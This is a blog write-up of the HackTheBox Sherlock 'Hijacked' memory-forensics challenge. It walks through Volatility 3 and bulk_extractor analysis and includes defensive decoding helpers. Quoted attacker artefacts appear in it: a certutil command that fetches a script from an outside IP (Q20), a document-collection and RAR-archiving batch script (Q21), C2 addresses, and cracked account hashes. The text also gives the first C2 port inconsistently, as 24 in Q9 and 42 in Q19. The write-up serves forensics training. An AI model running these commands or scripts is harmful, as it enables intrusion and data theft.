HackTheBox Hijacked Challenge - Sherlocks forensics

Introduction

In this blog post I will show how I solved the Hijacked challenge from the HTB Sherlocks series, which covers DFIR1 and memory forensics.
The description of the challenge is the following: Happy Grunwald, the CEO of Forela, decided to expand the company’s business in Lahore, Pakistan, and brought along his IT Administrator, Alonzo Spire, to help set up the new office and ensure the company’s IT infrastructure was running smoothly. However, they faced some challenges due to the language barrier and unreliable power supply in the area. Despite these challenges, they worked closely with local vendors to set up the new office, and Alonzo ensured the IT infrastructure was secure and reliable. They also made an effort to learn about the local culture and customs, which helped them build relationships with the locals. After a few days, Happy received a call from the UK security team, informing him that his workstation had been compromised, despite having received security awareness training and not opening any suspicious emails or links. A memory dump was retrieved and provided to you as the forensic analyst. Your task is to analyze the memory artefact and provide insight into the threat actor who compromised the workstation.

Q&A

Q1

  • What is the PID of the malicious process that gave the threat actor initial access?

    • found the malicious process with the malfind plugin (windows.malfind.Malfind) in Volatility 3
    • 9620 powershell.exe

Q2

  • There is no evidence of an email client being used. Which application did Happy Grunwald use to read the emails?
    • firefox.exe, because it is listed in the pslist output and no mail client is present

Q3

  • Happy told the security team that the email was from a System Administrator, so he immediately opened the attachment. What is the email address that sent the phishing email?
    • dumping the firefox process memory and running bulk_extractor over it recovers several e-mail addresses from the domain forela.co.uk. Since Happy said the mail came from a system administrator, we look inside that domain and find it was sent from alonzo.spire@forela.co.uk. In domain.txt we can also see that this e-mail is linked to the System Administrator

Q4

  • What was the subject/topic of the phishing email?
    • continuing the investigation, we filter all e-mails from alonzo.spire@forela.co.uk in the json.txt file extracted by bulk_extractor and find that the subject is: “Meeting with The New Operations team”

Q5

  • Happy was going through a document at the time of the incident. What’s the full path of the document?
    • in the process list a docx file can be seen open: C:\Users\happy.grunwald\Documents\C-level\Budget-Plan_Pakistan.docx

Q6

  • What’s the name of the malicious attachment that led to the initial infection?
    • in the process list there is a peculiar file inside the attachments folder named SystemHealthCheck.zip

Q7

  • Recover the document and find the Topic/heading of the document.
    • using bulk_extractor we can find a zip (the docx) carved out as XML; looking closer we can see the title: Budget plan For 2023-Asia Expansion

Q8

  • What’s the expected date of start of business in Pakistan?
    • still in the same XML extracted from the docx of that PID, there is a line that explicitly says: The business is expected to be fully under operation by 15 September 2023

Q9

  • The attacker connected to 2 different C2 addresses. What was the C2 IP and port number pair which facilitated initial remote access to the threat actor?
    • this can be found in the full PowerShell command line parameter, which is Base64-encoded; decoding it shows that the server IP is also embedded in the Base64 content. After that, get the netstat output of the Windows system and look for that IP to discover the port. The result is 43.204.228.96:24
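As an added example (my own code, not part of the challenge or this write-up), the decode step for Q9 in a reusable form: it peels the UTF-16LE -EncodedCommand layer, then any base64 literals handed to FromBase64String inside it, and collects every ip or ip:port seen at any layer. The command line it runs on is constructed here, and 192.0.2.10:24 is a documentation address, not the challenge's C2.

```python
import base64
import re

# Any prefix abbreviation of -EncodedCommand (-e, -ec, -enc, ...) followed by a base64 operand
ENC_FLAG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
# Base64 string literals handed to [Convert]::FromBase64String inside the decoded script
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
# IPv4 address with an optional :port suffix
IPV4 = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3})(?::(\d{1,5}))?")


def decode_powershell_layers(cmdline: str, max_depth: int = 5) -> list:
    """Return the script at each layer: the UTF-16LE -EncodedCommand, then nested base64 literals."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return []
    current = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    layers = [current]
    for _ in range(max_depth):  # bound the unwrapping so a crafted blob cannot loop forever
        blobs = B64_LITERAL.findall(current)
        if not blobs:
            break
        decoded = []
        for blob in blobs:
            raw = base64.b64decode(blob)
            # a NUL byte in ASCII-range text means the blob was UTF-16LE (re-encoded for -EncodedCommand)
            enc = "utf-16-le" if b"\x00" in raw else "utf-8"
            decoded.append(raw.decode(enc, errors="replace"))
        current = "\n".join(decoded)
        layers.append(current)
    return layers


def extract_endpoints(layers) -> set:
    """Collect ip or ip:port strings seen in any decoded layer."""
    return {f"{ip}:{port}" if port else ip
            for layer in layers for ip, port in IPV4.findall(layer)}


def build_sample_cmdline() -> str:
    """Constructed sample (not from the challenge): a two-layer encoded command carrying a URL."""
    inner = base64.b64encode(b"$u = 'http://192.0.2.10:24/'; Write-Output $u").decode()
    script = f"$s = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{inner}')); Write-Output $s"
    outer = base64.b64encode(script.encode("utf-16-le")).decode()
    return f"powershell.exe -NoProfile -EncodedCommand {outer}"


if __name__ == "__main__":
    found = decode_powershell_layers(build_sample_cmdline())
    print(len(found), "layers ->", extract_endpoints(found))
```

On a real dump, feed it the command line from Volatility's cmdline output for the suspicious PID; the port still has to be confirmed against netstat when the script carries only the address.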

Q10

  • The threat actor is known to set up and use Remote Access tools. Which tool did the attacker set up for Persistence?
    • TeamViewer, since it was pretty suspicious that it was running (?)

Q11

  • What’s the name of the malicious stager file that established C2 communication, giving the attacker a foothold?
    • taking the rar found in the temp folder via the process list (PID 6412), we can run binwalk on it, get the offset 3731440 where the embedded zip is, extract it with binwalk and see the name of its content: SystemHealthCheck.hta

Q12

  • The threat actor created a backdoor user to establish a backup persistence mechanism. What are the credentials of this account?
    • with the Volatility 3 plugin windows.hashdump.Hashdump we can recover the following LM and NT hashes, and crack the passwords:
    CyberJunkie     1001    aad3b435b51404eeaad3b435b51404ee        64f12cddaa88057e06a81b54e73b949b - Password1
    cyberjunkie12   1002    aad3b435b51404eeaad3b435b51404ee        64f12cddaa88057e06a81b54e73b949b - Password1
    helpdesk        1003    aad3b435b51404eeaad3b435b51404ee        7e92b8039c9100511e53a53beb2f16b1 - BILA@hud

    the helpdesk account holds the backup persistence credentials

Q13

  • To bypass email filters the attacker password protected the both of the zip files and provided the passwords to Happy. You are given the malicious attachment, but sadly Happy doesn’t remember the passwords. Recover the passwords and provide them in the order given by the attacker, separated by a comma and a space.
    • with the command strings -el Dump.mem | less and searching for the password keyword, it is possible to find the two passwords used to encrypt the first and second zip files: forela1234, forela123

Q14

  • Submit the MD5 hash of the stager file you retrieved.
    • retrieving the MD5 of the dropped hta file gives dd46189c153f8e3f4d34868df3f6511f

Q15

  • Which C2 Framework was used by the attacker?
    • since we have the MD5 of the dropper we can look it up on VirusTotal and check which C2 framework it was detected as: it was Empire

Q16

  • What is the PID of the process the threat actor abused for privilege escalation?
    • using Volatility 3 we can find the process with the windows.malfind.Malfind plugin, which gives us:
      4352    svchost.exe     0x169fd150000   0x169fd150fff   VadS    PAGE_EXECUTE_READWRITE  1       1       Disabled        N/A
      43 3a 5c 55 73 65 72 73 5c 68 61 70 70 79 2e 67 C:\Users\happy.g
      72 75 6e 77 61 6c 64 5c 41 70 70 44 61 74 61 5c runwald\AppData\
      4c 6f 63 61 6c 5c 54 65 6d 70 5c 57 69 6e 73 72 Local\Temp\Winsr
      76 63 2e 64 6c 6c 00 00 00 00 00 00 00 00 00 00 vc.dll..........
    
    • the PID is 4352

Q17

  • What is the path of the malicious file that resulted in privilege escalation?
    • the malfind output above already shows this path, so it is C:\Users\happy.grunwald\AppData\Local\Temp\Winsrvc.dll

Q18

  • What is the Mitre sub-technique ID with which the attacker escalated their privileges?
    • T1055.001 = Dynamic-link Library Injection: adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

Q19

  • Hunt for the second C2 Address to which connection was made by a LOLBIN after escalating privileges.
    • opening the pcap carved by bulk_extractor in Wireshark, we can see a very interesting remote port, 4444, besides the other C2 that uses 42. The IP related to port 4444 is 13.233.33.88, which is also an AWS IP, as was the one used for the first C2 communication, so the answer is 13.233.33.88:4444

Q20

  • The attacker directly downloaded a script from a web server. What is the full URL from where it was downloaded?
    • looking at the strings in the dump we can find an interesting command: certutil -urlcache -f http://13.127.18.201/SystemIntegrityCheck.bat %TEMP%\SystemIntegrityCheck.bat
    • so the answer is the URL of the .bat file: http://13.127.18.201/SystemIntegrityCheck.bat

Q21

  • The threat actor archived the collected data using tools like WinRAR, RAR, etc., before exfiltrating it. What is the password with which the TA archived the collected data?
    • we can get this information from the dump of the file found in the running explorer process:
    000001b0: 5b01 0000 1800 0000 0d0a 7365 7420 2273  [.........set "s
    000001c0: 6f75 7263 653d 2575 7365 7270 726f 6669  ource=%userprofi
    000001d0: 6c65 2522 0d0a 7365 7420 2264 6573 7469  le%"..set "desti
    000001e0: 6e61 7469 6f6e 3d25 7465 6d70 255c 4c6f  nation=%temp%\Lo
    000001f0: 6f74 446f 6373 220d 0a0d 0a23 504b 2d4f  otDocs"....#PK-O
    00000200: 5052 3234 0d0a 0d0a 6966 206e 6f74 2065  PR24....if not e
    00000210: 7869 7374 2022 2564 6573 7469 6e61 7469  xist "%destinati
    00000220: 6f6e 2522 206d 6b64 6972 2022 2564 6573  on%" mkdir "%des
    00000230: 7469 6e61 7469 6f6e 2522 0d0a 0d0a 666f  tination%"....fo
    00000240: 7220 2f72 2022 2573 6f75 7263 6525 2220  r /r "%source%" 
    00000250: 2525 6120 696e 2028 2a2e 646f 6378 202a  %%a in (*.docx *
    00000260: 2e64 6f63 6d20 2a2e 7064 6620 2a2e 786c  .docm *.pdf *.xl
    00000270: 7320 2a2e 7478 7420 2a2e 7070 7420 2a2e  s *.txt *.ppt *.
    00000280: 786c 7378 202a 2e70 7074 7829 2064 6f20  xlsx *.pptx) do 
    00000290: 280d 0a20 2020 2063 6f70 7920 2225 2561  (..    copy "%%a
    000002a0: 2220 2225 6465 7374 696e 6174 696f 6e25  " "%destination%
    000002b0: 220d 0a29 0d0a 0d0a 6364 2025 5445 4d50  "..)....cd %TEMP
    000002c0: 255c 4c6f 6f74 446f 6373 0d0a 2243 3a5c  %\LootDocs.."C:\
    000002d0: 5072 6f67 7261 6d20 4669 6c65 735c 5769  Program Files\Wi
    000002e0: 6e52 4152 5c52 6172 2e65 7865 2220 6120  nRAR\Rar.exe" a 
    000002f0: 4461 7461 202d 7020 7277 616a 6e6b 6867  Data -p rwajnkhg
    00000300: 6264 7479 616c 6d64 0d0a 0d0a 0d0a 7061  bdtyalmd......pa
    00000310: 7573 6500 0000 0000 ffff ffff 8279 4711  use..........yG.
    
    • so the password is rwajnkhgbdtyalmd

Q22

  • The threat actor that performed the attack is known for automating the collection of documents and files from compromised systems. The threat actor named their operation against Forela “PK-OPR24.” Our reverse engineer said that she found this string commented on multiple occurrences in the analysis of the malicious stager. Reverse the script and provide the file extensions that it collects, in the order they are presented in the code.

    • again, in the dump above we can see the file types it tries to collect, in this order:
      .docx, .docm, .pdf, .xls, .txt, .ppt, .xlsx, .pptx
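As an added example (my own code, not part of the challenge or this write-up), the script below reassembles the xxd-style dump shown under Q21 back into bytes and pulls out the staging variables, the collected extensions (Q22) and the RAR archive name and password (Q21) with regular expressions, so the same extraction can be repeated on a fresh process dump instead of reading the ASCII column by eye.

```python
import re

# xxd output of the collection script, copied from the explorer.exe process dump shown above
XXD_DUMP = r"""
000001b0: 5b01 0000 1800 0000 0d0a 7365 7420 2273  [.........set "s
000001c0: 6f75 7263 653d 2575 7365 7270 726f 6669  ource=%userprofi
000001d0: 6c65 2522 0d0a 7365 7420 2264 6573 7469  le%"..set "desti
000001e0: 6e61 7469 6f6e 3d25 7465 6d70 255c 4c6f  nation=%temp%\Lo
000001f0: 6f74 446f 6373 220d 0a0d 0a23 504b 2d4f  otDocs"....#PK-O
00000200: 5052 3234 0d0a 0d0a 6966 206e 6f74 2065  PR24....if not e
00000210: 7869 7374 2022 2564 6573 7469 6e61 7469  xist "%destinati
00000220: 6f6e 2522 206d 6b64 6972 2022 2564 6573  on%" mkdir "%des
00000230: 7469 6e61 7469 6f6e 2522 0d0a 0d0a 666f  tination%"....fo
00000240: 7220 2f72 2022 2573 6f75 7263 6525 2220  r /r "%source%"
00000250: 2525 6120 696e 2028 2a2e 646f 6378 202a  %%a in (*.docx *
00000260: 2e64 6f63 6d20 2a2e 7064 6620 2a2e 786c  .docm *.pdf *.xl
00000270: 7320 2a2e 7478 7420 2a2e 7070 7420 2a2e  s *.txt *.ppt *.
00000280: 786c 7378 202a 2e70 7074 7829 2064 6f20  xlsx *.pptx) do
00000290: 280d 0a20 2020 2063 6f70 7920 2225 2561  (..    copy "%%a
000002a0: 2220 2225 6465 7374 696e 6174 696f 6e25  " "%destination%
000002b0: 220d 0a29 0d0a 0d0a 6364 2025 5445 4d50  "..)....cd %TEMP
000002c0: 255c 4c6f 6f74 446f 6373 0d0a 2243 3a5c  %\LootDocs.."C:\
000002d0: 5072 6f67 7261 6d20 4669 6c65 735c 5769  Program Files\Wi
000002e0: 6e52 4152 5c52 6172 2e65 7865 2220 6120  nRAR\Rar.exe" a
000002f0: 4461 7461 202d 7020 7277 616a 6e6b 6867  Data -p rwajnkhg
00000300: 6264 7479 616c 6d64 0d0a 0d0a 0d0a 7061  bdtyalmd......pa
"""

# One xxd line: offset, colon, then up to eight 2-byte hex groups; the ASCII column is ignored
HEX_LINE = re.compile(r"^[0-9a-fA-F]+:\s+((?:[0-9a-fA-F]{4}\s){1,7}[0-9a-fA-F]{2,4})")


def xxd_to_bytes(dump: str) -> bytes:
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line.strip())
        if m:  # lines that are not hexdump rows (headers, blanks) are skipped
            out += bytes.fromhex(m.group(1))
    return bytes(out)


def analyse_collection_script(dump: str) -> dict:
    text = xxd_to_bytes(dump).decode("latin-1")  # 1:1 byte-to-char, never raises on the binary prefix
    variables = dict(re.findall(r'set "(\w+)=([^"]*)"', text))  # set "name=value"
    loop = re.search(r'for /r "[^"]*" %%\w in \(([^)]*)\)', text)  # for /r "%source%" %%a in (...)
    rar = re.search(r'Rar\.exe"\s+a\s+(\S+)\s+-p\s*(\S+)', text)  # Rar.exe a <archive> -p<password>
    return {"variables": variables,
            "extensions": [p.lstrip("*") for p in loop.group(1).split()] if loop else [],
            "archive_name": rar.group(1) if rar else None,
            "archive_password": rar.group(2) if rar else None}
```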

Q23

  • What Threat Actor seems to be in question? External Research is required, so keep in mind things like some of the techniques you identified so far, the Region in which they operate, etc.

    • searching the MITRE ATT&CK website for the Pakistan keyword and matching the way the attacker infiltrated and exfiltrated the data, we come to the conclusion that it is Mustang Panda

Conclusion

This investigation demonstrated the critical role of memory forensics in incident response. Using Volatility 3 and bulk_extractor, we reconstructed a complete attack chain from a single memory dump, identifying the initial phishing vector, malicious processes, C2 communications, privilege escalation techniques, and data exfiltration methods. The challenge highlighted how social engineering combined with advanced hacking skills (multiple C2 servers, the Empire framework, automated data collection) can compromise even the most security-aware organizations. Effective DFIR requires both technical tool proficiency and the analytical thinking to correlate artifacts and timeline events; these prove to be the best skills to have under your belt, even against adversaries with advanced hacking skills.

“You can erase files, but you can’t erase activity.”


  1. Digital Forensics and Incident Response